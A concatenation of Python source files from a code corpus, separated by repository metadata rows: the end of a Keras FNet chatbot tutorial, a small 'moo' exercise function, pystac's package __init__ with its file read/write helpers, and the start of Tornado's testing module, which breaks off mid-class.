    text = tf.strings.strip(text)
    return tf.strings.join(["[start]", text, "[end]"], separator=" ")
vectorizer = layers.TextVectorization(
VOCAB_SIZE,
standardize=preprocess_text,
output_mode="int",
output_sequence_length=MAX_LENGTH,
)
# We will adapt the vectorizer to both the questions and answers
# This dataset is batched to parallelize and speed up the process
vectorizer.adapt(tf.data.Dataset.from_tensor_slices((questions + answers)).batch(128))
"""
### Tokenizing and padding sentences using `TextVectorization`
"""
def vectorize_text(inputs, outputs):
    """Tokenize a (question, answer) pair and build teacher-forcing targets."""
    question_ids = vectorizer(inputs)
    # Pad one extra token on the right so the shifted decoder input and the
    # target keep the same length.
    answer_ids = tf.pad(vectorizer(outputs), [[0, 1]])
    features = {"encoder_inputs": question_ids, "decoder_inputs": answer_ids[:-1]}
    labels = {"outputs": answer_ids[1:]}
    return (features, labels)
# Tokenize both splits in parallel.
train_dataset = train_dataset.map(vectorize_text, num_parallel_calls=tf.data.AUTOTUNE)
val_dataset = val_dataset.map(vectorize_text, num_parallel_calls=tf.data.AUTOTUNE)

# Cache, shuffle (training split only), batch and prefetch to keep the
# input pipeline from starving the accelerator.
train_dataset = (
    train_dataset.cache()
    .shuffle(BUFFER_SIZE)
    .batch(BATCH_SIZE)
    .prefetch(tf.data.AUTOTUNE)
)
val_dataset = val_dataset.cache().batch(BATCH_SIZE).prefetch(tf.data.AUTOTUNE)
## Creating the FNet Encoder
The FNet paper proposes a replacement for the standard attention mechanism used by the
Transformer architecture (Vaswani et al., 2017).

The outputs of the FFT layer are complex numbers. To avoid dealing with complex layers,
only the real part (the magnitude) is extracted.
The dense layers that follow the Fourier transformation act as convolutions applied on
the frequency domain.
"""
class FNetEncoder(layers.Layer):
    """Transformer encoder block that mixes tokens with a 2D FFT.

    Replaces self-attention (Vaswani et al., 2017) with the Fourier mixing
    proposed by FNet: the input is transformed with FFT2D and only the real
    part of the spectrum is kept, followed by the usual residual +
    layer-norm + feed-forward structure.
    """

    def __init__(self, embed_dim, dense_dim, **kwargs):
        super(FNetEncoder, self).__init__(**kwargs)
        self.embed_dim = embed_dim
        self.dense_dim = dense_dim
        self.dense_proj = keras.Sequential(
            [
                layers.Dense(dense_dim, activation="relu"),
                layers.Dense(embed_dim),
            ]
        )
        self.layernorm_1 = layers.LayerNormalization()
        self.layernorm_2 = layers.LayerNormalization()

    def call(self, inputs):
        # fft2d requires a complex dtype; cast up, transform, then keep
        # only the real component of the result.
        complex_inputs = tf.cast(inputs, tf.complex64)
        mixed = tf.math.real(tf.signal.fft2d(complex_inputs))
        normed = self.layernorm_1(inputs + mixed)
        projected = self.dense_proj(normed)
        return self.layernorm_2(normed + projected)
"""
## Creating the Decoder
The decoder architecture remains the same as the one proposed by (Vaswani et al., 2017)
in the original transformer architecture, consisting of an embedding, positional
encoding, two masked multihead attention layers and finally the dense output layers.
The architecture that follows is taken from
[Deep Learning with Python, second edition, chapter 11](https://www.manning.com/books/deep-learning-with-python-second-edition).
"""
class PositionalEmbedding(layers.Layer):
    """Learned token embeddings summed with learned position embeddings."""

    def __init__(self, sequence_length, vocab_size, embed_dim, **kwargs):
        super(PositionalEmbedding, self).__init__(**kwargs)
        self.token_embeddings = layers.Embedding(
            input_dim=vocab_size, output_dim=embed_dim
        )
        self.position_embeddings = layers.Embedding(
            input_dim=sequence_length, output_dim=embed_dim
        )
        self.sequence_length = sequence_length
        self.vocab_size = vocab_size
        self.embed_dim = embed_dim

    def call(self, inputs):
        seq_len = tf.shape(inputs)[-1]
        position_ids = tf.range(start=0, limit=seq_len, delta=1)
        token_vectors = self.token_embeddings(inputs)
        position_vectors = self.position_embeddings(position_ids)
        return token_vectors + position_vectors

    def compute_mask(self, inputs, mask=None):
        # Token id 0 is the padding token; mask it for downstream layers.
        return tf.math.not_equal(inputs, 0)
class FNetDecoder(layers.Layer):
    """Standard transformer decoder block (Vaswani et al., 2017).

    Masked self-attention over the target sequence, cross-attention over
    the encoder outputs, then a feed-forward projection, each wrapped in a
    residual connection and layer normalization.
    """

    def __init__(self, embed_dim, latent_dim, num_heads, **kwargs):
        super(FNetDecoder, self).__init__(**kwargs)
        self.embed_dim = embed_dim
        self.latent_dim = latent_dim
        self.num_heads = num_heads
        self.attention_1 = layers.MultiHeadAttention(
            num_heads=num_heads, key_dim=embed_dim
        )
        self.attention_2 = layers.MultiHeadAttention(
            num_heads=num_heads, key_dim=embed_dim
        )
        self.dense_proj = keras.Sequential(
            [
                layers.Dense(latent_dim, activation="relu"),
                layers.Dense(embed_dim),
            ]
        )
        self.layernorm_1 = layers.LayerNormalization()
        self.layernorm_2 = layers.LayerNormalization()
        self.layernorm_3 = layers.LayerNormalization()
        self.supports_masking = True

    def call(self, inputs, encoder_outputs, mask=None):
        causal_mask = self.get_causal_attention_mask(inputs)
        # Bug fix: padding_mask was previously only bound inside the
        # `mask is not None` branch, raising NameError when no mask was
        # propagated. Default it to None (MultiHeadAttention accepts
        # attention_mask=None) and tighten it with the padding info when
        # a mask is available.
        padding_mask = None
        if mask is not None:
            padding_mask = tf.cast(mask[:, tf.newaxis, :], dtype="int32")
            padding_mask = tf.minimum(padding_mask, causal_mask)

        # Masked self-attention over the (shifted) target sequence.
        attention_output_1 = self.attention_1(
            query=inputs, value=inputs, key=inputs, attention_mask=causal_mask
        )
        out_1 = self.layernorm_1(inputs + attention_output_1)

        # Cross-attention over the encoder representation.
        attention_output_2 = self.attention_2(
            query=out_1,
            value=encoder_outputs,
            key=encoder_outputs,
            attention_mask=padding_mask,
        )
        out_2 = self.layernorm_2(out_1 + attention_output_2)

        proj_output = self.dense_proj(out_2)
        return self.layernorm_3(out_2 + proj_output)

    def get_causal_attention_mask(self, inputs):
        """Build a (batch, seq, seq) lower-triangular mask so that position
        i can only attend to positions <= i."""
        input_shape = tf.shape(inputs)
        batch_size, sequence_length = input_shape[0], input_shape[1]
        i = tf.range(sequence_length)[:, tf.newaxis]
        j = tf.range(sequence_length)
        mask = tf.cast(i >= j, dtype="int32")
        mask = tf.reshape(mask, (1, input_shape[1], input_shape[1]))
        # Tile the single mask across the batch dimension.
        mult = tf.concat(
            [tf.expand_dims(batch_size, -1), tf.constant([1, 1], dtype=tf.int32)],
            axis=0,
        )
        return tf.tile(mask, mult)
def create_model():
    """Assemble the end-to-end FNet encoder/decoder as a functional model."""
    # --- Encoder: positional embedding followed by one FNet mixing block.
    encoder_inputs = keras.Input(shape=(None,), dtype="int32", name="encoder_inputs")
    embedded_questions = PositionalEmbedding(MAX_LENGTH, VOCAB_SIZE, EMBED_DIM)(
        encoder_inputs
    )
    encoder_outputs = FNetEncoder(EMBED_DIM, LATENT_DIM)(embedded_questions)
    encoder = keras.Model(encoder_inputs, encoder_outputs)

    # --- Decoder: standalone sub-model taking target tokens plus the
    # encoded sequence, ending in a softmax over the vocabulary.
    decoder_inputs = keras.Input(shape=(None,), dtype="int32", name="decoder_inputs")
    encoded_seq_inputs = keras.Input(
        shape=(None, EMBED_DIM), name="decoder_state_inputs"
    )
    embedded_answers = PositionalEmbedding(MAX_LENGTH, VOCAB_SIZE, EMBED_DIM)(
        decoder_inputs
    )
    decoded = FNetDecoder(EMBED_DIM, LATENT_DIM, NUM_HEADS)(
        embedded_answers, encoded_seq_inputs
    )
    decoded = layers.Dropout(0.5)(decoded)
    decoder_outputs = layers.Dense(VOCAB_SIZE, activation="softmax")(decoded)
    decoder = keras.Model(
        [decoder_inputs, encoded_seq_inputs], decoder_outputs, name="outputs"
    )

    # Wire the decoder to the live encoder outputs to form the full model.
    decoder_outputs = decoder([decoder_inputs, encoder_outputs])
    fnet = keras.Model([encoder_inputs, decoder_inputs], decoder_outputs, name="fnet")
    return fnet
"""
## Creating and Training the model
"""
fnet = create_model()
fnet.compile("adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
"""
Here, the `epochs` parameter is set to a single epoch, but in practice the model will take around
**20-30 epochs** of training to start outputting comprehensible sentences. Although accuracy
is not a good measure for this task, we will use it just to get a hint of the improvement
of the network.
"""
fnet.fit(train_dataset, epochs=1, validation_data=val_dataset)
"""
## Performing inference
"""
VOCAB = vectorizer.get_vocabulary()
def decode_sentence(input_sentence):
    """Greedily decode a reply to ``input_sentence`` with the trained FNet."""
    # Tokenize the input, wrapped in the start/end markers the model expects.
    tokenized_input_sentence = vectorizer(
        tf.constant("[start] " + preprocess_text(input_sentence) + " [end]")
    )
    # Seed the target sequence with just the start token.
    tokenized_target_sentence = tf.expand_dims(VOCAB.index("[start]"), 0)
    decoded_sentence = ""

    for step in range(MAX_LENGTH):
        # Right-pad the partial target to the fixed decoder length.
        padded_target = tf.pad(
            tokenized_target_sentence,
            [[0, MAX_LENGTH - tf.shape(tokenized_target_sentence)[0]]],
        )
        predictions = fnet.predict(
            {
                "encoder_inputs": tf.expand_dims(tokenized_input_sentence, 0),
                "decoder_inputs": tf.expand_dims(padded_target, 0),
            }
        )
        # Greedy sampling: take the most probable token at this position.
        sampled_token_index = tf.argmax(predictions[0, step, :])
        sampled_token = VOCAB[sampled_token_index.numpy()]
        # Stop as soon as the end token is produced.
        if tf.equal(sampled_token_index, VOCAB.index("[end]")):
            break
        decoded_sentence += sampled_token + " "
        tokenized_target_sentence = tf.concat(
            [tokenized_target_sentence, [sampled_token_index]], 0
        )
    return decoded_sentence
decode_sentence("Where have you been all this time?")
"""
## Conclusion
This example shows how to train and perform inference using the FNet model.
For getting insight into the architecture or for further reading, you can refer to:
1. [FNet: Mixing Tokens with Fourier Transforms](https://arxiv.org/abs/2105.03824v3)
(Lee-Thorp et al., 2021)
2. [Attention Is All You Need](https://arxiv.org/abs/1706.03762v5) (Vaswani et al.,
2017)
Thanks to François Chollet for his Keras example on
[English-to-Spanish translation with a sequence-to-sequence Transformer](https://keras.io/examples/nlp/neural_machine_translation_with_transformer/)
from which the decoder implementation was extracted.
"""
| 35.795866 | 148 | 0.693279 |
66ae82dab4a607843bf070f7636cdf9c15b1603f | 173 | py | Python | summer-of-code/week-02/Nessa/moo.py | supersciencegrl/toolkitten | 59c661e58d23a55ff2651fee8ab7d9b2fe9aded6 | [
"MIT"
] | null | null | null | summer-of-code/week-02/Nessa/moo.py | supersciencegrl/toolkitten | 59c661e58d23a55ff2651fee8ab7d9b2fe9aded6 | [
"MIT"
] | null | null | null | summer-of-code/week-02/Nessa/moo.py | supersciencegrl/toolkitten | 59c661e58d23a55ff2651fee8ab7d9b2fe9aded6 | [
"MIT"
] | null | null | null | # ### MOO ###
# print("")
# print("### MOO ###")
# print("")
# n = int(input("How many cows do you have? "))
def moo(n):
    """Print and return the string "moo " repeated n times."""
    sound = "moo " * n
    print(sound)
    return sound
# moo(n) | 13.307692 | 47 | 0.462428 |
533fb429fac086b7499c7b14eed67adf5b19db24 | 7,452 | py | Python | pystac/__init__.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 60 | 2019-09-09T20:14:08.000Z | 2020-08-19T06:59:33.000Z | pystac/__init__.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 87 | 2019-09-14T15:47:23.000Z | 2020-08-19T16:23:32.000Z | pystac/__init__.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 24 | 2019-10-16T17:13:46.000Z | 2020-08-19T04:36:58.000Z | """
PySTAC is a library for working with SpatioTemporal Asset Catalogs (STACs)
"""
__all__ = [
"__version__",
"STACError",
"STACTypeError",
"DuplicateObjectKeyError",
"ExtensionAlreadyExistsError",
"ExtensionNotImplemented",
"ExtensionTypeError",
"RequiredPropertyMissing",
"STACValidationError",
"MediaType",
"RelType",
"StacIO",
"STACObject",
"STACObjectType",
"Link",
"HIERARCHICAL_LINKS",
"Catalog",
"CatalogType",
"Collection",
"Extent",
"SpatialExtent",
"TemporalExtent",
"Summaries",
"CommonMetadata",
"RangeSummary",
"Item",
"Asset",
"ItemCollection",
"Provider",
"ProviderRole",
"read_file",
"read_dict",
"write_file",
"get_stac_version",
"set_stac_version",
]
import os
from typing import Any, AnyStr, Dict, Optional, Union
from pystac.errors import (
STACError,
STACTypeError,
DuplicateObjectKeyError,
ExtensionAlreadyExistsError,
ExtensionNotImplemented,
ExtensionTypeError,
RequiredPropertyMissing,
STACValidationError,
)
from pystac.version import (
__version__,
get_stac_version,
set_stac_version,
)
from pystac.media_type import MediaType
from pystac.rel_type import RelType
from pystac.stac_io import StacIO
from pystac.stac_object import STACObject, STACObjectType
from pystac.link import Link, HIERARCHICAL_LINKS, HREF
from pystac.catalog import Catalog, CatalogType
from pystac.collection import (
Collection,
Extent,
SpatialExtent,
TemporalExtent,
)
from pystac.common_metadata import CommonMetadata
from pystac.summaries import RangeSummary, Summaries
from pystac.asset import Asset
from pystac.item import Item
from pystac.item_collection import ItemCollection
from pystac.provider import ProviderRole, Provider
import pystac.validation
import pystac.extensions.hooks
import pystac.extensions.datacube
import pystac.extensions.eo
import pystac.extensions.file
import pystac.extensions.item_assets
import pystac.extensions.label
import pystac.extensions.pointcloud
import pystac.extensions.projection
import pystac.extensions.sar
import pystac.extensions.sat
import pystac.extensions.scientific
import pystac.extensions.storage
import pystac.extensions.table
import pystac.extensions.timestamps
import pystac.extensions.version
import pystac.extensions.view
# Registry of the hooks for every extension bundled with PySTAC, so that
# objects using these extensions are handled during (de)serialization and
# version migration.
EXTENSION_HOOKS = pystac.extensions.hooks.RegisteredExtensionHooks(
    [
        pystac.extensions.datacube.DATACUBE_EXTENSION_HOOKS,
        pystac.extensions.eo.EO_EXTENSION_HOOKS,
        pystac.extensions.file.FILE_EXTENSION_HOOKS,
        pystac.extensions.item_assets.ITEM_ASSETS_EXTENSION_HOOKS,
        pystac.extensions.label.LABEL_EXTENSION_HOOKS,
        pystac.extensions.pointcloud.POINTCLOUD_EXTENSION_HOOKS,
        pystac.extensions.projection.PROJECTION_EXTENSION_HOOKS,
        pystac.extensions.sar.SAR_EXTENSION_HOOKS,
        pystac.extensions.sat.SAT_EXTENSION_HOOKS,
        pystac.extensions.scientific.SCIENTIFIC_EXTENSION_HOOKS,
        pystac.extensions.storage.STORAGE_EXTENSION_HOOKS,
        pystac.extensions.table.TABLE_EXTENSION_HOOKS,
        pystac.extensions.timestamps.TIMESTAMPS_EXTENSION_HOOKS,
        pystac.extensions.version.VERSION_EXTENSION_HOOKS,
        pystac.extensions.view.VIEW_EXTENSION_HOOKS,
    ]
)
def read_file(href: HREF, stac_io: Optional[StacIO] = None) -> STACObject:
    """Read a STAC object (Catalog, Collection or Item) from a file.

    Convenience wrapper around :meth:`StacIO.read_stac_object
    <pystac.StacIO.read_stac_object>`; the concrete class returned is
    determined by the file's contents.

    Args:
        href : The HREF to read the object from.
        stac_io: Optional :class:`~StacIO` instance to use for I/O
            operations. If not provided, :meth:`StacIO.default` is used.

    Returns:
        The STACObject implementation represented by the JSON at ``href``.

    Raises:
        STACTypeError : If the file at ``href`` does not represent a valid
            :class:`~pystac.STACObject`. Note that an
            :class:`~pystac.ItemCollection` is not a
            :class:`~pystac.STACObject` and must be read using
            :meth:`ItemCollection.from_file <pystac.ItemCollection.from_file>`
    """
    io = StacIO.default() if stac_io is None else stac_io
    return io.read_stac_object(href)
def write_file(
    obj: STACObject,
    include_self_link: bool = True,
    dest_href: Optional[HREF] = None,
    stac_io: Optional[StacIO] = None,
) -> None:
    """Write a single STACObject to a file.

    Only ``obj`` itself is written; linked objects are not followed (see
    :meth:`Catalog.save <pystac.Catalog.save>` for recursive saving). The
    JSON is written to ``dest_href`` when given, otherwise to the object's
    "self" link (see :meth:`STACObject.set_self_href
    <pystac.STACObject.set_self_href>`).

    Args:
        obj : The STACObject to save.
        include_self_link : If ``True``, include the ``"self"`` link with
            this object; otherwise leave it out.
        dest_href : Optional HREF to save the file to. If ``None``, the
            object is saved to its ``"self"`` href.
        stac_io: Optional :class:`~StacIO` instance to use for I/O
            operations. If not provided, :meth:`StacIO.default` is used.
    """
    io = StacIO.default() if stac_io is None else stac_io
    # Normalize path-like objects (e.g. pathlib.Path) to plain strings.
    target = None if dest_href is None else str(os.fspath(dest_href))
    obj.save_object(
        include_self_link=include_self_link, dest_href=target, stac_io=io
    )
def read_dict(
    d: Dict[str, Any],
    href: Optional[str] = None,
    root: Optional[Catalog] = None,
    stac_io: Optional[StacIO] = None,
) -> STACObject:
    """Parse a serialized STAC object out of a JSON-like dict.

    Returns a :class:`~Catalog`, :class:`~Collection`, or :class:`~Item`
    depending on the dict's contents. Convenience wrapper around
    :meth:`StacIO.stac_object_from_dict <pystac.StacIO.stac_object_from_dict>`.

    Args:
        d : The dict to parse.
        href : Optional href that is the file location of the object being
            parsed.
        root : Optional root of the catalog for this object. If provided,
            the root's resolved object cache can be used to search for
            previously resolved instances of the STAC object.
        stac_io: Optional :class:`~StacIO` instance to use for reading. If
            ``None``, the default instance is used.

    Raises:
        STACTypeError : If the ``d`` dictionary does not represent a valid
            :class:`~pystac.STACObject`. Note that an
            :class:`~pystac.ItemCollection` is not a
            :class:`~pystac.STACObject` and must be read using
            :meth:`ItemCollection.from_dict <pystac.ItemCollection.from_dict>`
    """
    io = StacIO.default() if stac_io is None else stac_io
    return io.stac_object_from_dict(d, href, root)
| 34.341014 | 86 | 0.711487 |
f3cfb77355d64f00cedd3455afd701bee6c43291 | 27,220 | py | Python | tornado/testing.py | codeb2cc/tornado | 1b6157dd03dbb393de5d1066a31f4810bf609686 | [
"Apache-2.0"
] | 2 | 2015-08-14T18:53:45.000Z | 2015-11-03T14:28:57.000Z | tornado/testing.py | yjkyz/tornado | d53f72fe6716e2c6956695ec1001930578e67407 | [
"Apache-2.0"
] | 1 | 2022-02-11T03:48:33.000Z | 2022-02-11T03:48:33.000Z | tornado/testing.py | yjkyz/tornado | d53f72fe6716e2c6956695ec1001930578e67407 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Support classes for automated testing.
* `AsyncTestCase` and `AsyncHTTPTestCase`: Subclasses of unittest.TestCase
with additional support for testing asynchronous (`.IOLoop` based) code.
* `ExpectLog` and `LogTrapTestCase`: Make test logs less spammy.
* `main()`: A simple test runner (wrapper around unittest.main()) with support
for the tornado.autoreload module to rerun the tests when code changes.
"""
from __future__ import absolute_import, division, print_function, with_statement
try:
from tornado import gen
from tornado.httpclient import AsyncHTTPClient
from tornado.httpserver import HTTPServer
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornado.ioloop import IOLoop, TimeoutError
from tornado import netutil
from tornado.process import Subprocess
except ImportError:
# These modules are not importable on app engine. Parts of this module
# won't work, but e.g. LogTrapTestCase and main() will.
AsyncHTTPClient = None
gen = None
HTTPServer = None
IOLoop = None
netutil = None
SimpleAsyncHTTPClient = None
Subprocess = None
from tornado.log import gen_log, app_log
from tornado.stack_context import ExceptionStackContext
from tornado.util import raise_exc_info, basestring_type
import functools
import logging
import os
import re
import signal
import socket
import sys
import types
try:
from cStringIO import StringIO # py2
except ImportError:
from io import StringIO # py3
try:
from collections.abc import Generator as GeneratorType # py35+
except ImportError:
from types import GeneratorType
# Tornado's own test suite requires the updated unittest module
# (either py27+ or unittest2) so tornado.test.util enforces
# this requirement, but for other users of tornado.testing we want
# to allow the older version if unitest2 is not available.
if sys.version_info >= (3,):
# On python 3, mixing unittest2 and unittest (including doctest)
# doesn't seem to work, so always use unittest.
import unittest
else:
# On python 2, prefer unittest2 when available.
try:
import unittest2 as unittest
except ImportError:
import unittest
_next_port = 10000
def get_unused_port():
    """Returns a (hopefully) unused port number.

    The port is not actually checked for availability; successive calls in
    one process simply hand out distinct numbers from a global counter.

    .. deprecated::
       Use bind_unused_port instead, which is guaranteed to find an unused
       port.
    """
    global _next_port
    _next_port += 1
    return _next_port - 1
def bind_unused_port():
    """Bind a server socket to an available port on localhost.

    Returns:
        A ``(socket, port)`` tuple.
    """
    # bind_sockets with a single IPv4 localhost address yields exactly one
    # socket; the single-element unpack asserts that invariant.
    sock, = netutil.bind_sockets(None, 'localhost', family=socket.AF_INET)
    return sock, sock.getsockname()[1]
def get_async_test_timeout():
    """Get the global timeout setting for async tests.

    Reads the ``ASYNC_TEST_TIMEOUT`` environment variable, falling back to
    5 seconds when it is unset or not a valid float.

    Returns a float, the timeout in seconds.

    .. versionadded:: 3.1
    """
    raw = os.environ.get('ASYNC_TEST_TIMEOUT')
    try:
        # float(None) raises TypeError when the variable is unset;
        # float("garbage") raises ValueError. Both fall back to the default.
        return float(raw)
    except (ValueError, TypeError):
        return 5
class _TestMethodWrapper(object):
"""Wraps a test method to raise an error if it returns a value.
This is mainly used to detect undecorated generators (if a test
method yields it must use a decorator to consume the generator),
but will also detect other kinds of return values (these are not
necessarily errors, but we alert anyway since there is no good
reason to return a value from a test.
"""
def __init__(self, orig_method):
self.orig_method = orig_method
def __call__(self, *args, **kwargs):
result = self.orig_method(*args, **kwargs)
if isinstance(result, GeneratorType):
raise TypeError("Generator test methods should be decorated with "
"tornado.testing.gen_test")
elif result is not None:
raise ValueError("Return value from test method ignored: %r" %
result)
def __getattr__(self, name):
"""Proxy all unknown attributes to the original method.
This is important for some of the decorators in the `unittest`
module, such as `unittest.skipIf`.
"""
return getattr(self.orig_method, name)
class AsyncTestCase(unittest.TestCase):
    """`~unittest.TestCase` subclass for testing `.IOLoop`-based
    asynchronous code.
    The unittest framework is synchronous, so the test must be
    complete by the time the test method returns. This means that
    asynchronous code cannot be used in quite the same way as usual.
    To write test functions that use the same ``yield``-based patterns
    used with the `tornado.gen` module, decorate your test methods
    with `tornado.testing.gen_test` instead of
    `tornado.gen.coroutine`. This class also provides the `stop()`
    and `wait()` methods for a more manual style of testing. The test
    method itself must call ``self.wait()``, and asynchronous
    callbacks should call ``self.stop()`` to signal completion.
    By default, a new `.IOLoop` is constructed for each test and is available
    as ``self.io_loop``. This `.IOLoop` should be used in the construction of
    HTTP clients/servers, etc. If the code being tested requires a
    global `.IOLoop`, subclasses should override `get_new_ioloop` to return it.
    The `.IOLoop`'s ``start`` and ``stop`` methods should not be
    called directly. Instead, use `self.stop <stop>` and `self.wait
    <wait>`. Arguments passed to ``self.stop`` are returned from
    ``self.wait``. It is possible to have multiple ``wait``/``stop``
    cycles in the same test.
    Example::
        # This test uses coroutine style.
        class MyTestCase(AsyncTestCase):
            @tornado.testing.gen_test
            def test_http_fetch(self):
                client = AsyncHTTPClient(self.io_loop)
                response = yield client.fetch("http://www.tornadoweb.org")
                # Test contents of response
                self.assertIn("FriendFeed", response.body)
        # This test uses argument passing between self.stop and self.wait.
        class MyTestCase2(AsyncTestCase):
            def test_http_fetch(self):
                client = AsyncHTTPClient(self.io_loop)
                client.fetch("http://www.tornadoweb.org/", self.stop)
                response = self.wait()
                # Test contents of response
                self.assertIn("FriendFeed", response.body)
        # This test uses an explicit callback-based style.
        class MyTestCase3(AsyncTestCase):
            def test_http_fetch(self):
                client = AsyncHTTPClient(self.io_loop)
                client.fetch("http://www.tornadoweb.org/", self.handle_fetch)
                self.wait()
            def handle_fetch(self, response):
                # Test contents of response (failures and exceptions here
                # will cause self.wait() to throw an exception and end the
                # test).
                # Exceptions thrown here are magically propagated to
                # self.wait() in test_http_fetch() via stack_context.
                self.assertIn("FriendFeed", response.body)
                self.stop()
    """
    def __init__(self, methodName='runTest', **kwargs):
        super(AsyncTestCase, self).__init__(methodName, **kwargs)
        # Internal state for the stop()/wait() handshake:
        # __stopped: stop() was called before/without a running wait()
        # __running: the IOLoop is currently running inside wait()
        # __failure: first exc_info captured by _handle_exception
        # __stop_args: value(s) passed to stop(), returned by wait()
        # __timeout: handle of the pending wait() timeout, if any
        self.__stopped = False
        self.__running = False
        self.__failure = None
        self.__stop_args = None
        self.__timeout = None
        # It's easy to forget the @gen_test decorator, but if you do
        # the test will silently be ignored because nothing will consume
        # the generator. Replace the test method with a wrapper that will
        # make sure it's not an undecorated generator.
        setattr(self, methodName, _TestMethodWrapper(getattr(self, methodName)))
    def setUp(self):
        super(AsyncTestCase, self).setUp()
        # Each test gets its own IOLoop, installed as the "current" loop
        # for the duration of the test.
        self.io_loop = self.get_new_ioloop()
        self.io_loop.make_current()
    def tearDown(self):
        # Clean up Subprocess, so it can be used again with a new ioloop.
        Subprocess.uninitialize()
        self.io_loop.clear_current()
        # Only close loops we created ourselves; never close the global
        # singleton instance, which other code may still be using.
        if (not IOLoop.initialized() or
                self.io_loop is not IOLoop.instance()):
            # Try to clean up any file descriptors left open in the ioloop.
            # This avoids leaks, especially when tests are run repeatedly
            # in the same process with autoreload (because curl does not
            # set FD_CLOEXEC on its file descriptors)
            self.io_loop.close(all_fds=True)
        super(AsyncTestCase, self).tearDown()
        # In case an exception escaped or the StackContext caught an exception
        # when there wasn't a wait() to re-raise it, do so here.
        # This is our last chance to raise an exception in a way that the
        # unittest machinery understands.
        self.__rethrow()
    def get_new_ioloop(self):
        """Creates a new `.IOLoop` for this test. May be overridden in
        subclasses for tests that require a specific `.IOLoop` (usually
        the singleton `.IOLoop.instance()`).
        """
        return IOLoop()
    def _handle_exception(self, typ, value, tb):
        # Exception handler installed by run(); records the first failure
        # for re-raising via __rethrow, logs any subsequent ones, and
        # unblocks a pending wait().  Returning True marks the exception
        # as handled for the ExceptionStackContext.
        if self.__failure is None:
            self.__failure = (typ, value, tb)
        else:
            app_log.error("multiple unhandled exceptions in test",
                          exc_info=(typ, value, tb))
        self.stop()
        return True
    def __rethrow(self):
        # Re-raise a captured failure, clearing it first so it is only
        # reported once.
        if self.__failure is not None:
            failure = self.__failure
            self.__failure = None
            raise_exc_info(failure)
    def run(self, result=None):
        # Route exceptions raised from asynchronous callbacks into
        # _handle_exception for the duration of the test.
        with ExceptionStackContext(self._handle_exception):
            super(AsyncTestCase, self).run(result)
        # As a last resort, if an exception escaped super.run() and wasn't
        # re-raised in tearDown, raise it here. This will cause the
        # unittest run to fail messily, but that's better than silently
        # ignoring an error.
        self.__rethrow()
    def stop(self, _arg=None, **kwargs):
        """Stops the `.IOLoop`, causing one pending (or future) call to `wait()`
        to return.
        Keyword arguments or a single positional argument passed to `stop()` are
        saved and will be returned by `wait()`.
        """
        # A positional result and keyword results are mutually exclusive.
        assert _arg is None or not kwargs
        self.__stop_args = kwargs or _arg
        if self.__running:
            self.io_loop.stop()
            self.__running = False
        self.__stopped = True
    def wait(self, condition=None, timeout=None):
        """Runs the `.IOLoop` until stop is called or timeout has passed.
        In the event of a timeout, an exception will be thrown. The
        default timeout is 5 seconds; it may be overridden with a
        ``timeout`` keyword argument or globally with the
        ``ASYNC_TEST_TIMEOUT`` environment variable.
        If ``condition`` is not None, the `.IOLoop` will be restarted
        after `stop()` until ``condition()`` returns true.
        .. versionchanged:: 3.1
           Added the ``ASYNC_TEST_TIMEOUT`` environment variable.
        """
        if timeout is None:
            timeout = get_async_test_timeout()
        if not self.__stopped:
            if timeout:
                def timeout_func():
                    # raise/except so that __failure holds a real exc_info
                    # triple with a traceback for __rethrow to re-raise.
                    try:
                        raise self.failureException(
                            'Async operation timed out after %s seconds' %
                            timeout)
                    except Exception:
                        self.__failure = sys.exc_info()
                    self.stop()
                self.__timeout = self.io_loop.add_timeout(self.io_loop.time() + timeout, timeout_func)
            # Keep restarting the loop until stop() was called and the
            # optional condition holds (or a failure was recorded).
            while True:
                self.__running = True
                self.io_loop.start()
                if (self.__failure is not None or
                        condition is None or condition()):
                    break
            if self.__timeout is not None:
                self.io_loop.remove_timeout(self.__timeout)
                self.__timeout = None
        assert self.__stopped
        # Reset state so the same test can do multiple wait()/stop() cycles.
        self.__stopped = False
        self.__rethrow()
        result = self.__stop_args
        self.__stop_args = None
        return result
class AsyncHTTPTestCase(AsyncTestCase):
    """A test case that starts up an HTTP server.
    Subclasses must override `get_app()`, which returns the
    `tornado.web.Application` (or other `.HTTPServer` callback) to be tested.
    Tests will typically use the provided ``self.http_client`` to fetch
    URLs from this server.
    Example, assuming the "Hello, world" example from the user guide is in
    ``hello.py``::
        import hello
        class TestHelloApp(AsyncHTTPTestCase):
            def get_app(self):
                return hello.make_app()
            def test_homepage(self):
                response = self.fetch('/')
                self.assertEqual(response.code, 200)
                self.assertEqual(response.body, 'Hello, world')
    That call to ``self.fetch()`` is equivalent to ::
        self.http_client.fetch(self.get_url('/'), self.stop)
        response = self.wait()
    which illustrates how AsyncTestCase can turn an asynchronous operation,
    like ``http_client.fetch()``, into a synchronous operation. If you need
    to do other asynchronous operations in tests, you'll probably need to use
    ``stop()`` and ``wait()`` yourself.
    """
    def setUp(self):
        super(AsyncHTTPTestCase, self).setUp()
        # Bind to an OS-assigned free port so concurrent test runs don't
        # collide; the port is exposed via get_http_port().
        sock, port = bind_unused_port()
        self.__port = port
        self.http_client = self.get_http_client()
        self._app = self.get_app()
        self.http_server = self.get_http_server()
        self.http_server.add_sockets([sock])
    def get_http_client(self):
        # May be overridden (e.g. by AsyncHTTPSTestCase) to customize the
        # client used by fetch().
        return AsyncHTTPClient(io_loop=self.io_loop)
    def get_http_server(self):
        # Server is built on the per-test IOLoop with any extra options
        # supplied by get_httpserver_options().
        return HTTPServer(self._app, io_loop=self.io_loop,
                          **self.get_httpserver_options())
    def get_app(self):
        """Should be overridden by subclasses to return a
        `tornado.web.Application` or other `.HTTPServer` callback.
        """
        raise NotImplementedError()
    def fetch(self, path, **kwargs):
        """Convenience method to synchronously fetch a url.
        The given path will be appended to the local server's host and
        port. Any additional kwargs will be passed directly to
        `.AsyncHTTPClient.fetch` (and so could be used to pass
        ``method="POST"``, ``body="..."``, etc).
        """
        self.http_client.fetch(self.get_url(path), self.stop, **kwargs)
        return self.wait()
    def get_httpserver_options(self):
        """May be overridden by subclasses to return additional
        keyword arguments for the server.
        """
        return {}
    def get_http_port(self):
